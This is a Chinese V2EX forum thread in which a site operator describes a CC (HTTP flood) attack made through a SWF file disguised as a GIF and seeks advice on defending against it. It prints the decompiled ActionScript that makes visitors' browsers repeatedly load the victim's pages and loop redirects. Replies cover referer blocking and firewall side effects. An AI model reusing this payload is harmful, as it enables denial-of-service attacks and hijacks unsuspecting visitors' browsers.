网站被人攻击了。方法很奇特

此人在某个流量比较高的网站挂了一个GIF图。

打开后是红叉。

我下载到本地。发现是用SWF伪装成的GIF

反编译后代码如下

loadMovieNum ("http://bbs.xxx.com/space.php?uid=680064", 1115191);
loadMovieNum ("http://www.xxx.com/home.php", 1115192);
loadMovieNum ("http://home.xxx.com/space.php?uid=2185", 1115193);
loadMovieNum ("http://www.xxx.com/group.php", 1115194);
loadMovieNum ("http://bbs.xxx.com/archiver/index.php?tid-658710.html", 1115195);
loadMovieNum ("http://bbs.xxx.com/task.php?action=apply&id=20", 1115196);
loadMovieNum ("http://mp3.xxx.com/hot.php", 1115197);
loadMovieNum ("http://home.xxx.com/index.php", 1115198);
if (_root._url.indexOf("img.xxxxxxxx.com") == -1) {
i = 1;
while (i <= 1000000000000 , i++) {
getURL ("http://www.taobao.com");
}
} else {
play();
}

xxx.com 是我们的网站。。

只要访客访问到他网站上的这个GIF图。就会不停的读取我们网站的数据。导致各频道频繁卡死。

各位有办法么

simpx

2011-01-08 22:19:55 +08:00

把referer是那个比较高的网站的流量都禁止了。不知道这样可以么？刚搜到http://www.cnblogs.com/rialover/archive/2010/10/29/1864313.html
这篇文章测试了一下通过swf访问get访问url，在有些浏览器中是可以获得正常referer的。

rety2008

2011-01-08 22:31:28 +08:00

目前解决办法是开启硬件防火墙。

但是开启防火墙后

QQ空间用户只要用了他网站上的这个FLASH做装饰的。

就被当成攻击IP被屏蔽了

现在已经屏蔽了几万个了。

也就是很多QQ空间用户访问不了我们网站了

GordianZ

2011-01-09 00:03:48 +08:00

就是cc攻击。要防的话就如＃4 ＃5所说，ban referer可以从一定程度上解决，而且不会出现硬防IP导致QQ空间用户不能访问的结果。

rety2008

2011-01-09 00:40:57 +08:00

谢谢各位。事情已经得以解决。

找到源头后。联系了该网站的管理员。

经确认，是网站内部技术人员所为。已经撤掉这段代码。

rety2008

2011-01-09 14:40:38 +08:00

现在有一个比较郁闷的事情。。

就是他这个文件已经被很多用户的浏览器缓存。

虽然服务器上已经去掉这个文件。但攻击依然有一小部分存在。

多数为用户缓存。对方也在想办法，如何设置才能把这些用户的缓存快速清理掉呢

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.